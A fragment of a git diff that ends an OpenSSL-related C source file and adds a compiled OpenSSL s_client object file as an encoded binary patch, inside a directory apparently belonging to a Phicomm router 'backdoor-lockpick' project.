+    OCSP_RESPONSE_free(rsp);
+    return 1;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_client.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_client.o
new file mode 100644
index 0000000000000000000000000000000000000000..fa3f851936cf58c64562701c153b92479c75e87b
GIT binary patch
literal 59824
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
